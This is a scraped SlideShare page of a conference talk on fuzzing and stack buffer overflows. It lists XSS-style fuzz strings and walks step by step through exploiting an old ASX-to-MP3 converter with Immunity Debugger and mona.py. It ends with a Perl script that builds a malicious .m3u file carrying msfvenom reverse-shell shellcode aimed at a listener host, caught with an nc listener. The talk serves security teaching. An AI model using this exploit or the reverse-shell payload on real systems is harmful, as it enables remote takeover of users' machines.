SlideShare ist ein Scribd-Unternehmen logo
Fuzzing
Finding Your Own Bugs and 0days!
• Penetration Tester
• Instructor I.T
• Consultant of I.S - 10 years
• EC-C|EH
• Author Hakin9 Magazine: Stack Overflow; Pentest Magazine: Covert Channel,
From Fuzzing to Get a Shell and From SEH Overwrite to Get a Shell
$Whoami
Rodolpho Concurde (ROd0X)
00
Agenda
Fuzzing
●
Types of targets;
●
Types of attacks;
●
Types of fuzzers;
●
Buffer overflow;
●
P0C!!
Types of targets
- Protocol: FTP, POP3, SMTP, Telnet, anyone!
- Application: Any INPUT of any application.
- File format: Any file Format (.mp3, .m3u, mp4, …) for test the
software’s reader!
Types of Attacks
Fuzzers would try combinations of attacks on:
- numbers
- chars
- metadata
- pure binary sequences
Is sent for the target one list with sequence of dangerous string.
Example: (-999999999, alert`1`, top["al"+"ert"](1),
<a href="data:text/html;base64_,<svg/onload=u0061&#x6C;
&#101%72t(1)>">X</a, 11000001000010010001100).
Types of Fuzzers -
Caracteristics
●
Dumb: any string combination;
●
Smart fuzzing:
Smart fuzzers are programmed with knowledge of the input format, i.e. a
protocol definition or rules for a file format.
- Mutation
-- Through replay and MITM or Proxy
- Generation
- Evolutionary
Ref: https://www.f-secure.com/en/consulting/our-thinking/15-minute-guide-to-fuzzing
Buffer overflow
Buffer overflow is an anomaly where a program, while writing
data to a buffer, overruns the buffer's boundary and overwrites
adjacent memory locations.
Might be:
Heap based: place in the memory which allocate lot amount of
data and, dynamically;
Stack based: Allocate a limited or fixed size of data, such as,
data from local variables or functions.
B.0 Code Example
int main(int argc, char *argv[])
{
// Reserve 5 byte of buffer plus the terminating NULL.
// To overflow, need more than 5 bytes...
char buffer[5]; // If more than 5 characters input
// by user, there will be access
// violation, segmentation fault
// a prompt how to execute the program...
if (argc < 2)
{
printf("strcpy() NOT executed....n");
printf("Syntax: %s <characters>n", argv[0]);
exit(0);
}
……………………...
P0C
Discovery INPUT format to realize the fuzz.
Example of the protocol POP3 - https://tools.ietf.org/rfc/rfc1081.txt
P0C
Vulnerable software to download:
https://www.exploit-db.com/apps/02fffa94e55f73bb2e467810fcad09f7-yahoopops-win-0.6.exe
P0C
P0C
Vul software to File Format Fuzzing!
http://s2.download.net.pl/ASX-to-MP3-Converter-4063-6400-5319.exe
Opening in Immunityy Debugger the software in:
File -> Attach -> ASX2MP3Converter and Run the same with F9
P0C
Image demonstrated below, show the code used to fuzzing the vulnerable software.
Sending to the INPUT of the software the String reached in variable [$buffer].
The value of variable [$buffer] can be generated utilizing the tool of Metasploit
pattern_create.
P0C
Compiling the code with the command [perl asx2mp3.pl]
After, load the file p0c.m3u in vul software, run the same in Immunity Debugger.
And we have a Stack Overflow!
P0C
The next step is utilize the pattern_offset to localize the Offset of EIP.
P0C
In Debugger, we make use of mona.py for see the modules utilized by the vulnerable
software. We need to find a address that make a JUMP from EIP to ESP, for in ESP we put
our shellcode.
Let’s search some module that make JUMP ESP, first let’s see the modules.
For this we will use the mona.py script:
https://raw.githubusercontent.com/corelan/mona/master/mona.py
You should make download of mona.py and paste at:
c:Program FilesImmunity IncImmunity DebuggerPyCommands
Let’s use the mona! Type in command bar of Immunity: !mona modules
We should find a module without mechanisms of protection.
P0C
Next step is find inside of msvos module, some expression that make a Jump to the ESP
Register; for this, first we should obtain the assembly value referent the JMP ESP.
Now, the mona command to find this expression.
P0C
From this command is find the address 0x01ba135b, and it we should insert in following
exploit code.
Now we need to search for bad characters, depending on the application, type of
vulnerability and protocols in use, may be certain characters which are considered "bad"
and should not be used in your buffer or shellcode.
One example of bad characters is 0x00.
This character is considered bad because a null byte is also used to terminate a string copy
operation, which would truncate our buffer whenever which the null byte appears.
For test if has more badchars in the software, close the software and the Immunity, and
reopen the Immunity and attach the software in the Immunity again.
P0C
P0C
We will send the string bellow inside of our exploit code.
"x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10"
"x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"
"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30"
"x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40"
"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50"
"x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"
"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70"
"x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"
"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90"
"x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"
"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0"
"xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"
"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0"
"xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"
"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0"
"xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
P0C
Sending badchars against the target!
P0C
In Immunity, give a click with right-button in ESP and click in Follow in Dump.
P0C
Dump of memory with badchars.
P0C
The character 0x00 and 0x0a we won’t send, because we already know that it is a
badchars and, for this, generate error in the software.
Our exploit code is like image below! We add variable badchars.
P0C
Dump of memory without badchar x0a.
Setted a Breakpoint in EIP address with a double-click we see the flow of execution stop in
the address chosen.
For last, let’s generate our shellcode with the msfvenom tool and introduce it in exploit
code.
P0C
Load the new malicious file inside ASX2MP3.
P0C
nc –lvvp 5555 - > to listen in a TCP port 5555
And we got a shell :)
#!/usr/bin/perl
my $buffsize = 50000;
my $junk = "x41" x 35056;
my $eip = "x5bx13xbax01";
my $nops = "x90" x 10;
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.114 LPORT=5555 -f perl
-e x86/shikata_ga_nai -b "x0ax00"
my $shell = "xdaxc2xf2xe7x42xdaxccxd9x74x24xf4x58x33xc9" .
"xb1x52x31x70x12x83xc0x04x03xb2xfcx05xb7xce" .
…. Shelllcode …. .
"x38xa2x9exb7x3dxeex18x24x4cx7fxcdx4axe3x80" .
"xba";
my $sploit = $junk.$eip.$nops.$shell;
my $fill = "x43" x ($buffsize - (length($sploit)));
my $buffer = $sploit.$fill;
# write the exploit buffer to file
my $file = "p0c.m3u";
open (FILE, ">$file");
print FILE $buffer;
close(FILE);
print "Exploit file created [" . $file . "]n";
print "Buffer size: ". length($buffer) . "n";
Exploit Code
Questions??
Thanks!
Rodolpho Concurde
rconcurde@gmail.com
https://www.linkedin.com/in/rodolphoconcurde

Weitere ähnliche Inhalte

Was ist angesagt?

Digital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The CloudDigital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The Cloud
Velocidex Enterprises
 
Digital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The CloudDigital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The Cloud
Velocidex Enterprises
 

Was ist angesagt? (20)

Open Source and Secure Coding Practices
Open Source and Secure Coding PracticesOpen Source and Secure Coding Practices
Open Source and Secure Coding Practices
 
Deploying Cloud Native Red Team Infrastructure with Kubernetes, Istio and Envoy
Deploying Cloud Native Red Team Infrastructure with Kubernetes, Istio and Envoy Deploying Cloud Native Red Team Infrastructure with Kubernetes, Istio and Envoy
Deploying Cloud Native Red Team Infrastructure with Kubernetes, Istio and Envoy
 
The Challenges of Becoming Cloud Native
The Challenges of Becoming Cloud NativeThe Challenges of Becoming Cloud Native
The Challenges of Becoming Cloud Native
 
5 Kubernetes Security Tools You Should Use
5 Kubernetes Security Tools You Should Use5 Kubernetes Security Tools You Should Use
5 Kubernetes Security Tools You Should Use
 
Whats new in brigade 2
Whats new in brigade 2Whats new in brigade 2
Whats new in brigade 2
 
Running a Cost-Effective DynamoDB-Compatible Database on Managed Kubernetes S...
Running a Cost-Effective DynamoDB-Compatible Database on Managed Kubernetes S...Running a Cost-Effective DynamoDB-Compatible Database on Managed Kubernetes S...
Running a Cost-Effective DynamoDB-Compatible Database on Managed Kubernetes S...
 
Practical Chaos Engineering
Practical Chaos EngineeringPractical Chaos Engineering
Practical Chaos Engineering
 
Embracing Observability in CI/CD with OpenTelemetry
Embracing Observability in CI/CD with OpenTelemetryEmbracing Observability in CI/CD with OpenTelemetry
Embracing Observability in CI/CD with OpenTelemetry
 
Image Scanning Best Practices for Containers and Kubernetes
Image Scanning Best Practices for Containers and KubernetesImage Scanning Best Practices for Containers and Kubernetes
Image Scanning Best Practices for Containers and Kubernetes
 
TWISummit 2019 - Build Security In
TWISummit 2019 - Build Security InTWISummit 2019 - Build Security In
TWISummit 2019 - Build Security In
 
FOSDEM 2021 - Infrastructure as Code Drift & Driftctl
FOSDEM 2021 - Infrastructure as Code Drift & DriftctlFOSDEM 2021 - Infrastructure as Code Drift & Driftctl
FOSDEM 2021 - Infrastructure as Code Drift & Driftctl
 
Go for Operations
Go for OperationsGo for Operations
Go for Operations
 
Reactive Extensions .NET
Reactive Extensions .NETReactive Extensions .NET
Reactive Extensions .NET
 
Continuous (Non-)Functional Testing of Microservices on K8s
Continuous (Non-)Functional Testing of Microservices on K8sContinuous (Non-)Functional Testing of Microservices on K8s
Continuous (Non-)Functional Testing of Microservices on K8s
 
Cloud Compliance with Open Policy Agent
Cloud Compliance with Open Policy AgentCloud Compliance with Open Policy Agent
Cloud Compliance with Open Policy Agent
 
Digital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The CloudDigital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The Cloud
 
SOCstock 2021 The Cloud-native SOC
SOCstock 2021 The Cloud-native SOC SOCstock 2021 The Cloud-native SOC
SOCstock 2021 The Cloud-native SOC
 
利用K8S實現高可靠應用
利用K8S實現高可靠應用利用K8S實現高可靠應用
利用K8S實現高可靠應用
 
Cloud native policy enforcement with Open Policy Agent
Cloud native policy enforcement with Open Policy AgentCloud native policy enforcement with Open Policy Agent
Cloud native policy enforcement with Open Policy Agent
 
Digital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The CloudDigital Forensics and Incident Response in The Cloud
Digital Forensics and Incident Response in The Cloud
 

Ähnlich wie stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!

exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
tutorialsruby
 

Ähnlich wie stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days! (20)

Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
 
Finding 0days at Arab Security Conference
Finding 0days at Arab Security ConferenceFinding 0days at Arab Security Conference
Finding 0days at Arab Security Conference
 
From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!From SEH Overwrite with Egg Hunter to Get a Shell!
From SEH Overwrite with Egg Hunter to Get a Shell!
 
Writing simple buffer_overflow_exploits
Writing simple buffer_overflow_exploitsWriting simple buffer_overflow_exploits
Writing simple buffer_overflow_exploits
 
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurdeFrom SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
From SEH Overwrite with Egg Hunter to Get a Shell_by_RodolphoConcurde
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacks
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
Buffer overflow
Buffer overflowBuffer overflow
Buffer overflow
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Dive into exploit development
Dive into exploit developmentDive into exploit development
Dive into exploit development
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Perl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testingPerl Usage In Security and Penetration testing
Perl Usage In Security and Penetration testing
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
 
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-bas...
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Slmail Buffer Overflow
Slmail Buffer OverflowSlmail Buffer Overflow
Slmail Buffer Overflow
 
Rust Hack
Rust HackRust Hack
Rust Hack
 
Exploiting buffer overflows
Exploiting buffer overflowsExploiting buffer overflows
Exploiting buffer overflows
 

Kürzlich hochgeladen

Mastering Windows 7 A Comprehensive Guide for Power Users .pdf
Mastering Windows 7 A Comprehensive Guide for Power Users .pdfMastering Windows 7 A Comprehensive Guide for Power Users .pdf
Mastering Windows 7 A Comprehensive Guide for Power Users .pdf
mbmh111980
 

Kürzlich hochgeladen (20)

5 Reasons Driving Warehouse Management Systems Demand
5 Reasons Driving Warehouse Management Systems Demand5 Reasons Driving Warehouse Management Systems Demand
5 Reasons Driving Warehouse Management Systems Demand
 
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
 
how-to-download-files-safely-from-the-internet.pdf
how-to-download-files-safely-from-the-internet.pdfhow-to-download-files-safely-from-the-internet.pdf
how-to-download-files-safely-from-the-internet.pdf
 
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdfMicrosoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
 
INGKA DIGITAL: Linked Metadata by Design
INGKA DIGITAL: Linked Metadata by DesignINGKA DIGITAL: Linked Metadata by Design
INGKA DIGITAL: Linked Metadata by Design
 
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdfA Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
A Comprehensive Appium Guide for Hybrid App Automation Testing.pdf
 
The Impact of PLM Software on Fashion Production
The Impact of PLM Software on Fashion ProductionThe Impact of PLM Software on Fashion Production
The Impact of PLM Software on Fashion Production
 
How to install and activate eGrabber JobGrabber
How to install and activate eGrabber JobGrabberHow to install and activate eGrabber JobGrabber
How to install and activate eGrabber JobGrabber
 
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with StrimziStrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi
 
AI/ML Infra Meetup | ML explainability in Michelangelo
AI/ML Infra Meetup | ML explainability in MichelangeloAI/ML Infra Meetup | ML explainability in Michelangelo
AI/ML Infra Meetup | ML explainability in Michelangelo
 
OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024OpenChain @ LF Japan Executive Briefing - May 2024
OpenChain @ LF Japan Executive Briefing - May 2024
 
Mastering Windows 7 A Comprehensive Guide for Power Users .pdf
Mastering Windows 7 A Comprehensive Guide for Power Users .pdfMastering Windows 7 A Comprehensive Guide for Power Users .pdf
Mastering Windows 7 A Comprehensive Guide for Power Users .pdf
 
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
Tree in the Forest - Managing Details in BDD Scenarios (live2test 2024)
 
CompTIA Security+ (Study Notes) for cs.pdf
CompTIA Security+ (Study Notes) for cs.pdfCompTIA Security+ (Study Notes) for cs.pdf
CompTIA Security+ (Study Notes) for cs.pdf
 
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product UpdatesGraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
 
Crafting the Perfect Measurement Sheet with PLM Integration
Crafting the Perfect Measurement Sheet with PLM IntegrationCrafting the Perfect Measurement Sheet with PLM Integration
Crafting the Perfect Measurement Sheet with PLM Integration
 
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERRORTROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
TROUBLESHOOTING 9 TYPES OF OUTOFMEMORYERROR
 
Advanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should KnowAdvanced Flow Concepts Every Developer Should Know
Advanced Flow Concepts Every Developer Should Know
 
AI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning FrameworkAI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning Framework
 
Implementing KPIs and Right Metrics for Agile Delivery Teams.pdf
Implementing KPIs and Right Metrics for Agile Delivery Teams.pdfImplementing KPIs and Right Metrics for Agile Delivery Teams.pdf
Implementing KPIs and Right Metrics for Agile Delivery Teams.pdf
 

stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!

  • 1. Fuzzing Finding Your Own Bugs and 0days!
  • 2. • Penetration Tester • Instructor I.T • Consultant of I.S - 10 years • EC-C|EH • Author Hakin9 Magazine: Stack Overflow; Pentest Magazine: Covert Channel, From Fuzzing to Get a Shell and From SEH Overwrite to Get a Shell $Whoami Rodolpho Concurde (ROd0X) 00
  • 3. Agenda Fuzzing ● Types of targets; ● Types of attacks; ● Types of fuzzers; ● Buffer overflow; ● P0C!!
  • 4. Types of targets - Protocol: FTP, POP3, SMTP, Telnet, anyone! - Application: Any INPUT of any application. - File format: Any file Format (.mp3, .m3u, mp4, …) for test the software’s reader!
  • 5. Types of Attacks Fuzzers would try combinations of attacks on: - numbers - chars - metadata - pure binary sequences Is sent for the target one list with sequence of dangerous string. Example: (-999999999, alert`1`, top["al"+"ert"](1), <a href="data:text/html;base64_,<svg/onload=u0061&#x6C; &#101%72t(1)>">X</a, 11000001000010010001100).
  • 6. Types of Fuzzers - Caracteristics ● Dumb: any string combination; ● Smart fuzzing: Smart fuzzers are programmed with knowledge of the input format, i.e. a protocol definition or rules for a file format. - Mutation -- Through replay and MITM or Proxy - Generation - Evolutionary Ref: https://www.f-secure.com/en/consulting/our-thinking/15-minute-guide-to-fuzzing
  • 7. Buffer overflow Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. Might be: Heap based: place in the memory which allocate lot amount of data and, dynamically; Stack based: Allocate a limited or fixed size of data, such as, data from local variables or functions.
  • 8. B.0 Code Example int main(int argc, char *argv[]) { // Reserve 5 byte of buffer plus the terminating NULL. // To overflow, need more than 5 bytes... char buffer[5]; // If more than 5 characters input // by user, there will be access // violation, segmentation fault // a prompt how to execute the program... if (argc < 2) { printf("strcpy() NOT executed....n"); printf("Syntax: %s <characters>n", argv[0]); exit(0); } ……………………...
  • 9.
  • 10. P0C Discovery INPUT format to realize the fuzz. Example of the protocol POP3 - https://tools.ietf.org/rfc/rfc1081.txt
  • 11. P0C Vulnerable software to download: https://www.exploit-db.com/apps/02fffa94e55f73bb2e467810fcad09f7-yahoopops-win-0.6.exe
  • 12. P0C
  • 13. P0C Vul software to File Format Fuzzing! http://s2.download.net.pl/ASX-to-MP3-Converter-4063-6400-5319.exe Opening in Immunityy Debugger the software in: File -> Attach -> ASX2MP3Converter and Run the same with F9
  • 14. P0C Image demonstrated below, show the code used to fuzzing the vulnerable software. Sending to the INPUT of the software the String reached in variable [$buffer]. The value of variable [$buffer] can be generated utilizing the tool of Metasploit pattern_create.
  • 15. P0C Compiling the code with the command [perl asx2mp3.pl] After, load the file p0c.m3u in vul software, run the same in Immunity Debugger. And we have a Stack Overflow!
  • 16. P0C The next step is utilize the pattern_offset to localize the Offset of EIP.
  • 17. P0C In Debugger, we make use of mona.py for see the modules utilized by the vulnerable software. We need to find a address that make a JUMP from EIP to ESP, for in ESP we put our shellcode. Let’s search some module that make JUMP ESP, first let’s see the modules. For this we will use the mona.py script: https://raw.githubusercontent.com/corelan/mona/master/mona.py You should make download of mona.py and paste at: c:Program FilesImmunity IncImmunity DebuggerPyCommands Let’s use the mona! Type in command bar of Immunity: !mona modules We should find a module without mechanisms of protection.
  • 18. P0C Next step is find inside of msvos module, some expression that make a Jump to the ESP Register; for this, first we should obtain the assembly value referent the JMP ESP. Now, the mona command to find this expression.
  • 19. P0C From this command is find the address 0x01ba135b, and it we should insert in following exploit code.
  • 20. Now we need to search for bad characters, depending on the application, type of vulnerability and protocols in use, may be certain characters which are considered "bad" and should not be used in your buffer or shellcode. One example of bad characters is 0x00. This character is considered bad because a null byte is also used to terminate a string copy operation, which would truncate our buffer whenever which the null byte appears. For test if has more badchars in the software, close the software and the Immunity, and reopen the Immunity and attach the software in the Immunity again. P0C
  • 21. P0C We will send the string bellow inside of our exploit code. "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff"
  • 23. P0C In Immunity, give a click with right-button in ESP and click in Follow in Dump.
  • 24. P0C Dump of memory with badchars.
  • 25. P0C The character 0x00 and 0x0a we won’t send, because we already know that it is a badchars and, for this, generate error in the software. Our exploit code is like image below! We add variable badchars.
  • 26. P0C Dump of memory without badchar x0a.
  • 27. Setted a Breakpoint in EIP address with a double-click we see the flow of execution stop in the address chosen. For last, let’s generate our shellcode with the msfvenom tool and introduce it in exploit code. P0C
  • 28.
  • 29. Load the new malicious file inside ASX2MP3. P0C
  • 30. nc –lvvp 5555 - > to listen in a TCP port 5555 And we got a shell :)
  • 31. #!/usr/bin/perl my $buffsize = 50000; my $junk = "x41" x 35056; my $eip = "x5bx13xbax01"; my $nops = "x90" x 10; # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.43.114 LPORT=5555 -f perl -e x86/shikata_ga_nai -b "x0ax00" my $shell = "xdaxc2xf2xe7x42xdaxccxd9x74x24xf4x58x33xc9" . "xb1x52x31x70x12x83xc0x04x03xb2xfcx05xb7xce" . …. Shelllcode …. . "x38xa2x9exb7x3dxeex18x24x4cx7fxcdx4axe3x80" . "xba"; my $sploit = $junk.$eip.$nops.$shell; my $fill = "x43" x ($buffsize - (length($sploit))); my $buffer = $sploit.$fill; # write the exploit buffer to file my $file = "p0c.m3u"; open (FILE, ">$file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]n"; print "Buffer size: ". length($buffer) . "n"; Exploit Code